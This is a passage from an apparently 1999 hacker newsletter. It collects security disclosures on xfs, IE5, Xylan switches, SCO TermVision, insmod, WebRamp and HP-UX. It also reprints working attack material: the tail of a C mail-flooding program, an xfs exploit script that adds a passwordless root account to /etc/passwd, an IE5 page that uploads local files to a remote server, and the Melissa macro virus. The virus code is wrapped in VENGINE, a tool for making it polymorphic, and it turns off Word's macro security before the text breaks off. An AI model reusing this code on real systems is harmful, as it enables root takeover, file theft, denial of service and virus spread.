(unsigned char)host->h_addr[2],
(unsigned char)host->h_addr[3]);
}
else sprintf(hostaddr,"%s",hostname);
#ifdef MORECONN
for (;loop<MAXCONN;loop++) if (!(chpid=fork())) {
#endif
for(;;) {
bzero(&(serv_addr.sin_zero),8);
if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) {
perror("socket()");
exit(errno);
}
if ((connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr))) == -1) {
perror("connect()");
exit(errno);
}
#ifdef VERBOSE
fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT);
#endif
bzero(buffer,BSIZE);read(sockfd,buffer,BSIZE);
#ifdef VERBOSE
fprintf(stderr,buffer);
#else
fprintf(stderr,".");
#endif
say("helo foo\n");
say("mail from:root@localhost\n");
say("rcpt to:" RCPT_TO "\n");
say("data\n");
for (x=0;x<=BSIZE;x++) buffer[x]='X';write(sockfd,buffer,BSIZE);
say("\n.\n");
sleep(1);
say("quit\n");
shutdown(sockfd,2);
close(sockfd);
#ifdef VERBOSE
fprintf(stderr,">Connection closed succesfully.\n");
#endif
}
#ifdef MORECONN
}
waitpid(chpid,NULL,0);
#endif
return 0;
}
--- CUT HERE ---
@HWA
11.0 Xylan Omniswitch 'features' (DoS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 31 Mar 1999 19:12:20 +0000
From: pmsac@TOXYN.ORG
To: BUGTRAQ@netspace.org
Subject: Xylan OmniSwitch "features"
Sorry if this is already known.
Stepped into two "features" of Xylan OmniSwitches (also works on Pizza).
These switches are sold OEM to Alcatel (which just bought Xylan) and IBM.
Number one: anyone can telnet to the switch and login, without knowing
either user or passwod strings. No permission will be given to perform
any command, which is not so bad.
This could work as a DoS, because software versions until 3.1.8 (don't know
about later ones) only allow one interactive session, displaying a message
of "System alread in use" in other attempts. However, since you can do this
DoS even without logging in (just sitting at the login prompt) it's not much
of a DoS.
Number two: anyone can ftp to the switch, whitout knowing either user or
password strings. Everyone is allowed to read all files in the flash,
and even upload files (but not remove or overwrite existing ones).
Since reading all files gives access to SNMP community strings, this could
be trouble, which are stored in clear text on one of the files, and writing
files, well, just use your imagination.
This was tested on software version 3.1.8 (the lastest I can access).
Thanks to cock@p.ulh.as, which helped test the vulnerability.
Have a nice day.
Disclaimers:
- This "feature" report was only sent here, personal option; software that's
worth thounsands of dollars should be better beta tested;
- I do know switches aren't generally accessible from the internet.
@HWA
12.0 xfs exploitability warning
~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug in xfs
Lukasz Trabinski (lukasz@LT.WSISIZ.EDU.PL)
Tue, 30 Mar 1999 00:14:34 +0200
Hello,
I hope that's information will be useful for making new patch for
XFree86.
I found bug in xfs
(Packet XFree86-xfs-3.3.3.1-1 in RedHat 5.1 and probably in RedHat 5.2
updates, too)
Xfs is a font server for XFree86, it's also create directory in /tmp
That directory name .font-unix
Let's make a little check:
On first console (I logged as a normal user)
[lukasz@lt /tmp]$ cat /etc/shadow
cat: /etc/shadow: Permission denied
[lukasz@lt /tmp]$ ls -all /etc/shadow
-r-------- 1 root root 544 Mar 30 00:04 /etc/shadow
[lukasz@lt /tmp]$ ll
total 2
drwxrwxrwt 2 root root 1024 Mar 30 00:05 .
drwxr-xr-x 18 root root 1024 Mar 23 00:10 ..
lrwxrwxrwx 1 lukasz users 11 Mar 30 00:05 .font-unix ->
/etc/shadow
On second console, as root
[root@lt /root]# xfs &
[1] 2021
[root@lt /root]# _FontTransSocketCreateListener: failed to bind listener
_FontTransSocketUNIXCreateListener: ...SocketCreateListener() failed
_FontTransMakeAllCOTSServerListeners: failed to create listener for local
On first console:
[lukasz@lt /tmp]$ ls -all /etc/shadow
-rwxrwxrwt 1 root root 544 Mar 30 00:04 /etc/shadow
^^^^^^^^^^^
That's all ;)
Solution, As root before run xfs, make rm -rf /tmp/.font-unix
Sorry for my broken English ;(
_[ Lukasz Trabinski ]_
PgP Key: finger:lukasz@oceanic.wsisiz.edu.pl, SysAdmin @wsisiz.edu.pl
-----------------------------------------------------------------------
Re: Bug in xfs
Matthieu Herrb (matthieu@laas.fr)
Wed, 31 Mar 1999 08:04:17 +0200
You wrote (in your message from Tuesday 30)
>
> I hope that's information will be useful for making new patch for
> XFree86.
>
> I found bug in xfs
This is caused by the same bug in xc/lib/xtrans that "in.telnetd"
<telnetd@DOEMILL.SHOCKING.COM> reported under the subject "X11R6 NetBSD
Security Problem" last week.
The patch I submitted (with stat() replaced by lstat(), as noted by
Kevin Vajk and other) also fixes that.
--
Matthieu
-----------------------------------------------------------------------
Re: Bug in xfs
Juha Virtanen (jiivee@iki.fi)
Wed, 31 Mar 1999 09:38:28 +0300
Regardless of the bug Lukasz Trabinski found in xfs -- it should
be fixed and similar bugs traced from other software as well --
it is not necessary to run xfs with root permissions at all.
Someone may unknowingly argue that it needs to listen a port.
Yes, but that's usually port 7100, and as it's not under 1024
limit, so root permission isn't needed.
I've run xfs for ages on separate account. below is the
significant startup line I use in RedHat 5.x systems:
daemon /bin/su fontsvr -c "/usr/X11/bin/xfs -config /etc/X11/fs/config -port 7100 &"
The rule is: if a daemon can do its work with lower permissions
than root, it should.
I do also run named as nonroot permissions (Startup
/usr/sbin/named -u user -g group). I recommend other people
doing this as well.
Juha Virtanen
--
<URL:http://www.iki.fi/jiivee/>
-----------------------------------------------------------------------
Re: Bug in xfs
Alan Cox (alan@LXORGUK.UKUU.ORG.UK)
Wed, 31 Mar 1999 10:25:07 +0100
> I do also run named as nonroot permissions (Startup
> /usr/sbin/named -u user -g group). I recommend other people
> doing this as well.
This isnt one to do blindly as it means named cannot bind to interfaces
that appear dynamically (eg as a DNS cache on a terminal server). The
fact that you end up having to run named as root or with the relevant
capability to allow it to bind to low ports.
Alan
-----------------------------------------------------------------------
Re: Bug in xfs
Roman Drahtmueller (draht2@RZLIN1.RUF.UNI-FREIBURG.DE)
Wed, 31 Mar 1999 05:10:14 +0200
[snip]
> [lukasz@lt /tmp]$ ls -all /etc/shadow
> -r-------- 1 root root 544 Mar 30 00:04 /etc/shadow
[snip]
> [root@lt /root]# xfs &
[snip]
> [lukasz@lt /tmp]$ ls -all /etc/shadow
> -rwxrwxrwt 1 root root 544 Mar 30 00:04 /etc/shadow
[snip]
> Solution, As root before run xfs, make rm -rf /tmp/.font-unix
For sure this needs to be fixed. Your "solution" introduces a race
condition, though, if the font server is started when users are
allowed to log on.
A better interim aid is not to run xfs as root in the first place. In
fact, why would one want to run things as root if not necessary?
Roman.
Computer Center University of Freiburg, Germany.
"The whole world is about three drinks behind." (Humphrey Bogart)
@HWA
12.1 xfsx.sh - Very simple shell script exploit code for the recently discovered xfs
security hole. By ArchAng3| of Death, Midgard Security Team.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/sh
# X Font Server **exploit**
# ArchAng3| of Death -- Member Of Midgard Security Team
# usage: xfsx &
# the proggie stays in the background checking for write access to
# /etc/passwd when it haves write access it creates an account and
# mails back at you.
if [ -f /tmp/.font-unix ]; then
echo "File already exists..."
echo "Aborting..."
exit
else
echo "Creating symlink to /etc/passwd..."
ln -s /etc/passwd /tmp/.font-unix
echo "Symlink created..."
echo "Now just wait until root executes xfs..."
while (true); do
sleep 60;
if [ -w /etc/passwd ]; then
echo "r00t::0:0:r00t:/:/bin/bash" >> /etc/passwd
echo "0wn3d..." > .xfsxtmp666
echo `cat /etc/passwd |grep r00t` >> .xfsxtmp666
echo "su r00t might be a good thing to do ..." >> .xfsxtmp666
cat .xfsxtmp666 |mail `whoami`
rm -f .xfsxtmp666
rm -f /tmp/.font-unix
exit
fi;
done
fi
@HWA
13.0 Bug allows remote systems to read local files remotely in MSIE5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 30 Mar 1999 19:35:16 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: IE 5.0 allows reading and sending local files to a remote server
There is a security bug in Internet Explorer 5.0, which allows reading
and
sending local files to a remote server.
The problem is a bug in the DHTML edit control, which allows pasting a
filename in a FILE object. When the form is submitted via JavaScript,
the
contents of the file are sent to a remote server.
Demonstration is available at: http://www.nat.bg/~joro/fr.html
Workaround: Disable JavaScript
I would like to thank Juan Cuartango
(http://pages.whowhere.com/computers/cuartangojc/index.html) for his IE
exploits,
which helped me a lot for discovering this vulnerability!
Regards,
Georgi Guninski
http://www.nat.bg/~joro
-------------------------------------------------------------------------
[http://www.nat.bg/~joro/fr.html]
<!--HTML><HEAD><TITLE>IE 5.0 file reading</TITLE>
</HEAD>
<BODY>
There is a bug in Internet Explorer 5.0 which allows reading and sending local files.
<BR>
The file name must be known.
<BR>
Thanks to Juan Cuartango for his exploits, which helped me a lot for discovering this vulnerability!
<BR>
Written by <A HREF="http://www.nat.bg/~joro">Georgi Guninski</A>
<BR>
Workaround: Disable JavaScript
<BR>
<BR>
<INPUT TYPE=TEXT ID=A1 VALUE="C:\TEST.TXT">
<SCRIPT>
function f1()
{
document.all.A1.select();
document.execCommand("copy");
dh.DOM.forms(0).elements(0).focus();
dh.execCommand(5032);
setTimeout("dh.DOM.forms(0).submit();",1000);
}
function f()
{
alert("Create a file C:\\test.txt and it will be read and shown in another window \n You may need to wait some time");
dh.loadURL("http://www.nat.bg/~joro/form3.html");
setTimeout("f1()",2000);
}
setTimeout("f();",1000);
</SCRIPT>
<OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A height=100 id=dh
width=700>
</OBJECT>
<!/BODY>
</HTML-->
-------------------------------------------------------------------------
Date: Wed, 31 Mar 1999 09:14:47 +0100
From: Andrew Tulloch <frohicky@TECHNOLOGIST.COM>
To: BUGTRAQ@netspace.org
Subject: Re: IE 5.0 allows reading and sending local files to a remote server
If you look under scripting options in security settings there is the option
"Allow paste via script" simply turning this to disabled provides this
result:
<paste>
See the contents of your file among the other stuff
----------------------------------------------------------------------------
----
-----------------------------7cf26c3b6a8 Content-Disposition: form-data;
name = "a"; filename="" Content-Type:
application/octet-stream -----------------------------7cf26c3b6a8--
</paste>
which as far as I see has disabled the reading of local files and is a
little less drastic than disabling all JavaScript.
Regards,
Andrew Tulloch
-------------------------------------------------------------------------
Date: Wed, 31 Mar 1999 14:05:21 -0800
From: "Stephen Purpura (MSFDC-JV)" <v-spurpu@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: IE 5.0 allows reading and sending local files to a remote server
There is another workaround. In IE5, if you use the "built in" feature to
limit scripted paste operations then the problem doesn't seem to manifest.
Try the following and goto the sample implementation:
Tools menu --> Internet options --> security tab --> custom level --> allow
paste operations via script = prompt or disable
Stephen
@HWA
14.0 Possible root/user level compromise in SCO TermVision
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 31 Mar 1999 16:50:13 +0100
From: JJ Gray <nexus@PATROL.I-WAY.CO.UK>
To: BUGTRAQ@netspace.org
Subject: Potential vulnerability in SCO TermVision Windows 95 client
Hi folks,
I recently downloaded a trial version of the SCO TermVision
terminal emulation package for SCO Openserver 5 and Windows 95 (
http://www.sco.com/vision/products/termvision/ ). This comes
in two parts, the server based binaries and the Windows 95 client,
TermVision 2.1. In addition to the terminal emulation you get
'UNIX Neighborhood' which once supplied with a hostname, username &
password gives an explorer/X-Windows style interface to the SCO server.
In the default configuration the hostnames, usernames & passwords are
saved in a file : C:\Windows\Profiles\%username%\Application
Data\SCO\Vision\Auth\%username%.vca
( PC is Windows 95, NT4 server, user profiles ). The data is encrypted
but, not being a cryptanalysist, it took me a good 15 minutes to
discover the encryption is nothing more than a fixed string XOR :(
I informed SCO of this on 30th March and received a reply the next day :)
--
>From Matthew Schofield, Support <mattsc@sco.com>
JJ,
Thanks for highlighting this issue in the Vision Comms.
By your own definition it is insecure, in that the contents of the .vca
files can be obtained with some effort. In terms of actually using
someone's .vca file through the comms layer in order to access the UNIX
resources through a Vision product, the files can only read by the
comms layer if the user has successfully logged into Windows as that user.
--
Extracted from my reply -
This is of no consequence. The point is that I can extract the UNIX
username & password from another user that has used the same PC.
If that user happens to use root access then I have the root password -
thus a non privileged user with windows access can gain root privs on
the UNIX box, whether through UNIX Neighborhood, terminal emulation,
a terminal itself, telnet etc. If I were a windows user with no user
account on the UNIX box......... :)
--
When adding a host, the security options can be set to 'Prompt' where the
password is not saved. Yes this is only a potential security hole -
another on the 'Configuration' issue, but it is not obvious that this
vulnerability exists. The default is insecure and there is no 'obvious'
information in the documentation that it is so - hence my post.
Matthew finished by saying
--
As you have already identified, you should change the password mechanism
for your host to prompt. In a future release we intend to either change
the operation of the password mechanism or add an appropriate warning.
--
Can't really say fairer than that I suppose...
Regards,
JJ Gray
Sed quis custodiet ipsos custodes ?
@HWA
15.0 Linux INSMOD exploit/vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 30 Mar 1999 22:08:13 -0500
From: Brian Szymanski <bks10@CORNELL.EDU>
To: BUGTRAQ@netspace.org
Subject: linux insmod bug/security vulnerability
Howdy all,
Recently I discovered a bug in insmod that would require a lot of time
and luck to exploit, but is nonetheless important for systems wanting
rock-solid security (security shouldn't be a matter of luck). In short,
when insmod is called without a full path to the module to load, it
checks a small path to find the module in question. By default, this
path is the current directory followed by the /lib/modules/ heirarchy.
In the widely distributed versions of the software, the module is not
checked for root ownership, and there is no way to tell which file has
been loaded after insmod is called. Needless to say, putting a malicious
user's code in to the kernel and then running it in kernel mode is a
very Bad Thing.
LINUX DEVELOPERS, HOWTO-WRITERS, ETC... TAKE HEED!!!
The listed maintainer of the program, Jacques Gelinas
(jack@solucorp.qc.ca), informs me that modprobe (not insmod) should be
used to load pathless modules from the /lib/modules heirarchy, but in
practice most people (and precanned scripts) use insmod, compounding the
problem. It appears that the well distributed versions of modprobe are
NOT vulnerable to these bugs (tested on debian 2.1). ***Please change
any documentation you write or scripts you distribute to use modprobe
instead of insmod ASAP*** This should probably be forwarded to some sort
of linux development list, but I know of none at the moment.
VERSIONS AFFECTED, IMPROVED (if not fixed) VERSION:
The versions included in debian, redhat, and most if not all other
distributions are vulnerable as well. Any version previous to 2.2.2-pre6
(available from
http://www.pi.se/blox/modutils/modutils-2.2.2-pre6.tar.gz). Please
upgrade to this version, which one of the package maintainers, Bjorn
Ekwall (bj0rn@blox.se), informs me fixes the following issues:
o A module has to be owned by root.
o All "path-less" modules are resolved according to the list of
paths in conf.modules (explicitly or via the built-in defaults).
Note that all module utilities use the same configuration
and thus the same paths in the new release.
o If insmod is called without a path to the module, insmod will
print the full path of the module it actually selects to install.
PROBLEMS IN THE NEW VERSION:
The new version is a big improvement, but not perfect (after all, it's a
pre-stable version...) The last 2 points appear to be implemented fine,
but the first is imperfect. The root ownership checks only appear to
happen when the path to the module is not specified. I don't see any
reason why you would ever need to load a module owned by a user, when
you can just su and copy /chown it. Also, there is some oddness when a
module in /lib/modules isn't owned by root. insmod spits out 24(!) lines
like this:
insmod: /lib/modules/2.2.4/misc/vmmon is not owned by root
That's better, but I still don't like the idea of bugs in this area of
the code...
Another thing to be wary of: There may be some unresolved issues with
groups and permissions, but it'd probably just be bloat for this package
to worry about warning of those issues (IE, mode a+w modules or g+w
with group != root). Then again, linux's swapon checks for the proper
permissions on a swapfile/device, so perhaps it wouldn't be unreasonable
to warn about permissions.
I don't see what's so hard about just checking for ownership and
permissions issues *after* resolving the full path of the module, but
then again, I've been too lazy to RTFS so far, so sue me if it isn't
that trivial.
EXPLOIT:
As previously mentioned, an exploit would require a lot of luck and
time, but would basically consist of regularly throwing a lot of
trojan'd .o files in /tmp, and waiting until root decides to clean out
tmp right before loading some module... Far-fetched but too possible for
comfort. Other scenarios along these lines could be imagined. Equally
far fetched, but the point is the currently distributed versions don't
do it the Right Way... It's a lot more likely that you would make your
system crash and burn due to this bug (although files do seem to be
checked to be in elf format before being loaded).
Thanks for reading. Comments and constructive criticisms more than
welcome:
Brian Szymanski
bks10@cornell.edu
@HWA
16.0 Webramp DoS
~~~~~~~~~~~
Date: Wed, 31 Mar 1999 15:28:22 -0500 (EST)
From: X-Force <xforce@iss.net>
To: alert@iss.net
Cc: X-Force <xforce@iss.net>
Subject: ISSalert: ISS Security Advisory -- WebRamp Denial of Service Attacks
TO UNSUBSCRIBE: email "unsubscribe alert" in the body of your message to
majordomo@iss.net Contact alert-owner@iss.net for help with any problems!
---------------------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
ISS Security Advisory -- WebRamp Denial of Service Attacks
March 31, 1999
Synopsis:
Ramp Networks (http://www.rampnet.com/) WebRamp Internet access devices
allow multiple computers to share a dialup connection. The WebRamp family
of Internet access devices are designed for small businesses that require
cost-effective, high-speed Internet access on every desktop.
WebRamp is vulnerable to two denial of service attacks that allow an
attacker to either crash the WebRamp device or change its IP address.
When the device crashes, it will have to be manually reset before
it will dial up. If an attacker changes the IP address of the WebRamp,
none of the machines on your network will be able to find it, so no
machines will be able to access the Internet via the WebRamp. The device
will still function as a network hub, so your intra-LAN connectivity will
not be disrupted.
Description:
WebRamp crash/denial of service attack: Sending a specially formatted string
of characters to the HTTP port of the WebRamp causes the device to hang,
requiring a manual reset.
WebRamp IP address change: Sending a specially-formatted UDP packet to port
5353 changes the WebRamp's local IP address, effectively 'hiding' the
device from the rest of your machines. The WebRamp is still connected to
the Internet and its PPP IP address is unchanged.
Recommendations:
If an attacker has crashed your WebRamp, then manually reset it by turning
it off and on again.
If an attacker has changed the IP address, use WRFINDER.EXE on the WebRamp
installation CD to change the address to a proper value.
Fix Information:
Go to http://www.rampnet.com/upgrades to get the latest firmware for your
model of WebRamp.
Additional Information:
Information in this advisory was obtained by the research of Jon Larimer
<jlarimer@iss.net> of the ISS X-Force. ISS X-Force would like to thank
Ramp Networks <http://www.rampnet.com> for their assistance with testing
on WebRamp devices and providing fix information.
________
Copyright (c) 1999 by Internet Security Systems, Inc.
Permission is hereby granted for the electronic redistribution of this
Security Advisory. It is not to be edited in any way without express
consent of the X-Force. If you wish to reprint the whole or any part of
this Security Advisory in any other medium excluding electronic medium,
please e-mail xforce@iss.net for permission.
Internet Security Systems, Inc. (ISS) is the leading provider of adaptive
network security monitoring, detection, and response software that
protects the security and integrity of enterprise information systems. By
dynamically detecting and responding to security vulnerabilities and
threats inherent in open systems, ISS's SAFEsuite family of products
provide protection across the enterprise, including the Internet,
extranets, and internal networks, from attacks, misuse, and security
policy violations. ISS has delivered its adaptive network security
solutions to organizations worldwide, including firms in the Global 2000,
nine of the ten largest U.S. commercial banks, and over 35 governmental
agencies. For more information, call ISS at 678-443-6000 or 800-776-2362
or visit the ISS Web site at http://www.iss.net.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.
X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html as
well as on MIT's PGP key server and PGP.com's key server.
X-Force Vulnerability and Threat Database: http://www.iss.net/xforce
Please send suggestions, updates, and comments to:
X-Force <xforce@iss.net> of Internet Security Systems, Inc.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv
iQCVAwUBNwEjQTRfJiV99eG9AQHS2AQAilU+R2J0pU2DMi+0CBMjl1zwIPob990s
n4ECDLLimt66TLeZW3fBxstHOzWUJ1YRPm/Ahb0oeyDqx54Cv4LA3uZttq5mZ2+d
d84nPbznpzC6Q/9eqVX8tNF0cp2TNc2eIqkwV4I1ZZ68JMkepmglT73mPqpzWJL8
fIT8UGYykDs=
=4bwl
-----END PGP SIGNATURE-----
@HWA
17.0 HP Security bulletins, (March 31)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 31 Mar 1999 04:35:03 -0800 (PST)
Subject: Security Bulletins Digest
>From: support_feedback@us-support.external.hp.com (HP Electronic Support Center )
To: security_info@us-support.external.hp.com
Reply-To: support_feedback@us-support.external.hp.com
Errors-To: support_errors@us-support.external.hp.com
HP Support Information Digests
===============================================================================
o HP Electronic Support Center World Wide Web Service
---------------------------------------------------
If you subscribed through the HP Electronic Support Center and would
like to be REMOVED from this mailing list, access the
HP Electronic Support Center on the World Wide Web at:
http://us-support.external.hp.com
Login using your HP Electronic Support Center User ID and Password.
Then select Support Information Digests. You may then unsubscribe from the
appropriate digest.
===============================================================================
?
Digest Name: Daily Security Bulletins Digest
Created: Wed Mar 31 3:00:02 PST 1999
Table of Contents:
Document ID Title
--------------- -----------
HPSBUX9903-096 Security Vulnerability in MC/ServiceGuard & MC/LockManager
HPSBUX9903-095 Security Vulnerability with DESMS
The documents are listed below.
-------------------------------------------------------------------------------
?
Document ID: HPSBUX9903-096
Date Loaded: 19990330
Title: Security Vulnerability in MC/ServiceGuard & MC/LockManager
-------------------------------------------------------------------------
HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00096, 31 March 1999
-------------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
-------------------------------------------------------------------------
PROBLEM: MC/ServiceGuard and MC/LockManager exhibit improper
implementation of restricted SAM functionality.
PLATFORM: HP 9000 Series 700/800 Servers running HP-UX 10.X and 11.00
DAMAGE: Users can gain increased privileges.
SOLUTION: Apply the patches listed below.
AVAILABILITY: All patches are available now.
-------------------------------------------------------------------------
I.
A. Background
MC/ServiceGuard and MC/LockManager exhibit improper implementation
of restricted SAM functionality.
B. Fixing the problem - Install the applicable patch:
HP-UX
Release Product Revision Patch ID
10.00 MC/SG A.10.03 PHSS_17478
10.01 MC/SG A.10.03 PHSS_17478
10.10 MC/SG MC/LM A.10.05 PHSS_17479
10.20 MC/SG MC/LM A.10.06 PHSS_17480
10.20 MC/SG A.10.11 PHSS_17580
10.20 MC/LM A.10.07.01 PHSS_17482
11.00 MC/SG A.11.05 PHSS_17581
11.00 MC/LM A.11.05 PHSS_17483
11.00 MC/LM-J A.11.05 PHSS_17484
C. To subscribe to automatically receive future NEW HP Security
Bulletins or access the HP Electronic Support Center, use your
browser to get to our ESC web page at:
http://us-support.external.hp.com (for non-European locations),
or http://europe-support.external.hp.com (for Europe)
Login with your user ID and password (or register for one).
Remember to save the User ID/password assigned to you.
Once you are in the Main Menu:
To -subscribe- to future HP Security Bulletins,
click on "Support Information Digests".
To -review Security bulletins already released-,
click on the "Search Technical Knowledge Database."
To -retrieve patches-, click on "Individual Patches" and select
appropriate release and locate with the patch identifier (ID).
To -browse the HP Security Bulletin Archive-, select the link at
the bottom of the page once in the "Support Information Digests".
To -view the Security Patch Matrix-, (updated daily) which
categorizes security patches by platform/OS release, and by
bulletin topic, go to the archive (above) and follow the links.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this Bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the Bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
________________________________________________________________________
-----End of Document ID: HPSBUX9903-096--------------------------------------
?
Document ID: HPSBUX9903-095
Date Loaded: 19990330
Title: Security Vulnerability with DESMS
-------------------------------------------------------------------------
HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00095, 31 March 1999
-------------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
-------------------------------------------------------------------------
PROBLEM: Domain Enterprise Server Management System (DESMS) processes
allow increased privileges.
PLATFORM: HP 9000 Series 7/800 Servers running HP-UX 10.20 and 11.00
DAMAGE: Users can gain increased privileges.
SOLUTION: Apply the patches listed below.
AVAILABILITY: All patches are available now.
-------------------------------------------------------------------------
I.
A. Background
Hewlett-Packard Company HP9000 Series 7/800 servers that run the
following software packages have extra Domain Management
background processes running which cause security problems.
B. Fixing the problem
If you are using one of the products listed below, then install
the applicable patch for your revision of HP-UX:
For HP-UX release 10.20: PHNE_17948;
For HP-UX release 11.00: PHNE_18017 for product J1593AA only;
For HP-UX release 11.00: PHNE_17949 for all other products
listed below.
Product Description Affected Revision
J1564DA Netscape Calendar Server All
J1592AA HP Domain Service Control All
J1593AA A/R HP Domain Service Control Packaged Edition All
J3633CA Netscape/Informix US/Canada All
J3638BA HP Domain/Netscape Suitespot Pro All
J3641DA Netscape Enterprise Server All
J3651DA Netscape Collabra Server All
J3655DA Netscape Message Server All
J3667AA Netscape Directory Server All
J3675BA HP Domain/Netscape SuiteSpot (S700) All
J3676BA HP Domain/Netscape SuiteSpot (S800) All
J3678AA Netscape Proxy Server All
J4244AA Domain Commerce Server All
NOTE: This vulnerability does not apply to any of the
VirtualVault releases.
C. To subscribe to automatically receive future NEW HP Security
Bulletins or access the HP Electronic Support Center, use your
browser to get to our ESC web page at:
http://us-support.external.hp.com (for non-European locations),
or http://europe-support.external.hp.com (for Europe)
Login with your user ID and password (or register for one).
Remember to save the User ID/password assigned to you.
Once you are in the Main Menu:
To -subscribe- to future HP Security Bulletins,
click on "Support Information Digests".
To -review Security bulletins already released-,
click on the "Search Technical Knowledge Database."
To -retrieve patches-, click on "Individual Patches" and select
appropriate release and locate with the patch identifier (ID).
To -browse the HP Security Bulletin Archive-, select the link at
the bottom of the page once in the "Support Information Digests".
To -view the Security Patch Matrix-, (updated daily) which
categorizes security patches by platform/OS release, and by
bulletin topic, go to the archive (above) and follow the links.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this Bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the Bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
________________________________________________________________________
-----End of Document ID: HPSBUX9903-095--------------------------------------
@HWA
18.0 VENGINE - creates polymorphic variants of the melissa virus. code included.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
VENGINE - Coded by VeggieTailz, Copyleft 1999
The Vengine, combined with your favorite Microsoft Word macro virus,
produces a polymorphic version of that virus. Sorry kiddiez, but you
will need rudementary VBA skillz to use this. Instructions are included
in the vengine.txt file, and an example is given with the Melissa virus.
I had several motivations for writing this. One, of course, was to
demonstrate that WOMEN CAN CODE TOO, a fact often overlooked in today's
patriarchal society. Secondly, I was motivated by all the delightful
publicity provided by the mass media surrounding the Melissa virus.
Seriously, folks, no one would write viruses if the antivirus community
didn't give them such limelight for it! :-) I also wanted to pedistal
yet another egregious security hole brought to you by Microsoft. And,
lastly, my initial inspiration came from Nick FitzGerald's asinine
posting to BugTraq, dated 3/29/99, in which he argues that:
"By reformatting the source, you have created a new variant."
Thanks to the Vengine, now every copy of the virus can be a new variant!
Files in this archive:
Polyssa.txt - The Melissa virus modified with the Vengine
Polyssa2.txt - A 2nd generation of Polyssa
Vengine.txt - The Vengine source code and usage directions
Melissa.txt - The original Melissa virus
Readme.txt - This file
kiddiez.txt - STEP-BY-STEP INSTRUCTIONS, FOR THE BRAINDEAD
In closing, I would like to give a big pat-on-the-back to the drooling
masses out there who unwittingly propogate MS-Word macro viruses. Without
these people, neither the virus writers nor the antivirus people would
be in business! Remember: When MS-Word asks you if you want to open a
document because it might contain virus code, JUST SAY NO. ;->
\/eggieTailz
-=-
Polyssa.txt
-=-
' Polyssa - polymorphic version of Melissa
'
' This code demonstrates how to use the Vengine polymorphizer for MS-Word.
' Both the example and the Vengine itself were coded by VeggieTailz. The
' original Melissa code was written by Kwyjibo.
'
' The Vengine concept was inspired by Nick FitzGerald's asinine posting
' on BugTraq, dated 3/29/99 and archived at geek-girl.com. Special
' thanks go to Microsoft for their myopic scripting language.
'
Private Zy7td() As String
Private QC2cz() As String
Private K1j() As String
Private Nv4cl As String
Private Sub Document_Open()
On Error Resume Next
Randomize: If Rnd > 0.6 Then OldMelissaCode
End Sub
Private Sub Document_Close()
On Error Resume Next
Randomize: If Rnd > 0.6 Then OldMelissaCode
End Sub
Private Sub OldMelissaCode()
' This is the Melissa code, obtained from www.root.org
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
